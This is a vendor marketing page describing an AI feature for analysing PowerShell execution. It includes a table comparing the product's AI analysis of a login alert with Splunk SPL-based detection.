PowerShell Analysis
Monitors and analyzes PowerShell execution patterns to detect malicious activity, privilege escalation attempts, and suspicious command execution that may indicate compromise.
Fluency's AI analyzes PowerShell execution events to identify suspicious patterns, obfuscated commands, and potential privilege escalation attempts. The system examines command syntax, execution context, and historical patterns to distinguish between legitimate administrative tasks and malicious activity.
AI Analysis vs Splunk SPL-Based Detection
See how advanced AI-driven security analysis compares to traditional SPL-based detection in key areas of context, logic, and output quality.
| Feature / Capability | AI Analysis | Splunk SPL-Based Detection |
|---|---|---|
| IP to location logic | Accurate with human-readable locations (Barcelona → Opfikon) and real-world travel distance | Based on iplocation, sometimes inaccurate or outdated; no city-to-city distance context |
| Device context awareness | The AI recognize the second IP is from a known AVD endpoint, and distinguish cloud-hosted vs. personal device | SPL treats IPs as flat values; doesn’t infer context from device names unless explicitly encoded in a lookup |
| User role logic | Knows the user is a subcontractor marked ONLY REMOTE, making virtual desktop infrastructure login expected. | SPL cannot infer or evaluate user roles without joining external HR or identity data. |
| Session analysis | The AI considered whether logins belong to the same session or different contexts (VDI vs. local) | SPL can’t link session context unless it’s engineered manually (e.g., through token IDs, session IDs) |
| False positive suppression logic | Advises suppression based on trusted IP/device combinations, remote work patterns, and device type | Requires custom correlation searches, lookups, or external context ingestion |
| ML signal interpretation | Distinguishes why the alert triggered (ML_NEW_USER, ML_NEW_GEO_ISP) and de-risks based on identity validation | SPL will just flag those risks; human/AI interpretation must be layered on top |
| Analyst judgment | Emulates how a human SOC analyst would reason through intent, identity, and environment | SPL doesn’t support nuanced intent modeling without external logic or ML/UEBA tooling |
| Output quality | Clear, contextual, explainable narrative with defensive recommendations | SPL produces tabular alerts and risk scores; lacks explanation without additional dashboards or notes |